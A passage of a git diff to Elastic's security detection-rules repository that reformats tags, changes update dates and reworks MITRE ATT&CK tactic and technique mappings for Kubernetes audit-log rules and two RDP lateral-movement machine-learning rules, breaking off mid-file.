+updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -69,7 +69,13 @@ references = [ risk_score = 21 rule_id = "63c056a0-339a-11ed-a261-0242ac120002" severity = "low" -tags = ["Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -82,24 +88,6 @@ user_agent.original:(* and not (*kubernetes/$Format or karpenter or csi-secrets- [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" @@ -109,6 +97,7 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml index 5b03ba10457..359940c58b7 100644 --- a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml +++ b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml @@ -2,7 +2,7 @@ creation_date = "2022/06/30" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -91,11 +91,6 @@ kubernetes.audit.objectRef.resource:("selfsubjectaccessreviews" or "selfsubjectr [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" @@ -105,6 +100,7 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml index f670851fa90..25df5e78816 100644 --- a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml +++ b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -40,11 +40,6 @@ kubernetes.audit.objectRef.resource == "pods" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml index c3976832488..19a1619b8ab 100644 --- a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml +++ b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/24" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/19" [rule] author = ["Elastic"] @@ -57,7 +57,13 @@ Kubernetes, a container orchestration platform, manages applications across clus risk_score = 47 rule_id = "ec81962e-4bc8-48e6-bfb0-545fc97d8f6a" severity = "medium" -tags = ["Tactic: Privilege Escalation", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide" + ] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -68,12 +74,7 @@ kubernetes.audit.stage == "ResponseComplete" and `kubernetes.audit.annotations.a [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml index b99c04c5b26..b6fa7170cb4 100644 --- a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml +++ b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/17" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -55,7 +55,13 @@ Kubernetes, a container orchestration platform, manages applications across clus risk_score = 47 rule_id = "4b77d382-b78e-4aae-85a0-8841b80e4fc4" severity = "medium" -tags = ["Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -68,15 +74,11 @@ user_agent.original:(* and not (*kubernetes/$Format)) [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml index 9c6166c4479..1dcd69850d3 100644 --- a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml +++ b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/18" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -56,7 +56,14 @@ Kubernetes orchestrates containerized applications, relying on API requests for risk_score = 21 rule_id = "8a1db198-da6f-4500-b985-7fe2457300af" severity = "low" -tags = ["Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Domain: Container", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Domain: Container", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -72,15 +79,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["kubernetes.audit.annotations.authorization_k8s_io/decision", "kubernetes.audit.user.username", "user_agent.original"] diff --git a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml index c7d081ec603..a850dfd2023 100644 --- a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml +++ b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -67,7 +67,14 @@ references = [ risk_score = 47 rule_id = "63c057cc-339a-11ed-a261-0242ac120002" severity = "medium" -tags = ["Tactic: Initial Access", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -95,6 +102,7 @@ reference = "https://attack.mitre.org/techniques/T1078/001/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml index 803bf630a6a..229f671329b 100644 --- a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml +++ b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/18" [rule] author = ["Elastic"] @@ -76,7 +76,7 @@ references = [ risk_score = 47 rule_id = "65f9bccd-510b-40df-8263-334f03174fed" severity = "medium" -tags = ["Tactic: Initial Access", "Tactic: Persistence", "Data Source: Kubernetes", "Resources: Investigation Guide"] +tags = ["Data Source: Kubernetes", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -91,26 +91,14 @@ event.dataset : "kubernetes.audit_logs" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1133" name = "External Remote Services" reference = "https://attack.mitre.org/techniques/T1133/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml index 83338845d36..ec7881b3507 100644 --- a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml +++ b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/20" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -85,24 +85,24 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml index b64d6a1d21f..de40e62409d 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -96,24 +96,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml index 0161fff49b9..15f42caaf18 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -101,24 +101,24 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml index 96772301c11..eebe0cdc29e 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -99,24 +99,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml index 253479e9a3c..ec7c7a3285f 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/11" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -107,24 +107,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml index 0ad2e174afe..f68d1d287ff 100644 --- a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml +++ b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -99,24 +99,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml index 157115d18dd..550d4cdd47e 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -54,7 +54,14 @@ references = [ risk_score = 47 rule_id = "3c82bf84-5941-495b-ac41-0302f28e1a90" severity = "medium" -tags = ["Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -75,19 +82,6 @@ sequence by user.name with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" @@ -99,9 +93,9 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -117,6 +111,6 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml index c4900f37adf..cd55cbf8734 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/05" [rule] author = ["Elastic"] @@ -53,7 +53,14 @@ references = [ risk_score = 21 rule_id = "78c6559d-47a7-4f30-91fe-7e2e983206c2" severity = "low" -tags = ["Tactic: Execution", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -68,24 +75,38 @@ not kubernetes.audit.user.groups:"system:masters" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1053.007" -name = "Container Orchestration Job" -reference = "https://attack.mitre.org/techniques/T1053/007/" +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original", "source.ip", "kubernetes.audit.user.username"] diff --git a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml index 747bfb801fd..0314f867e2f 100644 --- a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml +++ b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -89,9 +89,9 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -107,6 +107,6 @@ name = "Additional Container Cluster Roles" reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml index c482f279901..6c59087b0b3 100644 --- a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml +++ b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -93,24 +93,16 @@ not kubernetes.audit.requestObject.spec.containers.image:( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.001" +name = "Default Accounts" +reference = "https://attack.mitre.org/techniques/T1078/001/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml index 8993db07aa2..a2e6b2e13ee 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -51,7 +51,13 @@ The Lateral Movement Detection integration detects lateral movement activity by - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = ["Use Case: Lateral Movement Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide"] +tags = [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] type = "machine_learning" note = """## Triage and analysis @@ -89,31 +95,14 @@ Remote Desktop Protocol (RDP) facilitates remote access to systems, often target - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems have been compromised.""" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml index 9b7810b788f..db8f0b280e8 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] anomaly_threshold = 70 @@ -96,18 +96,14 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating adm - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation.""" [[rule.threat]] framework = 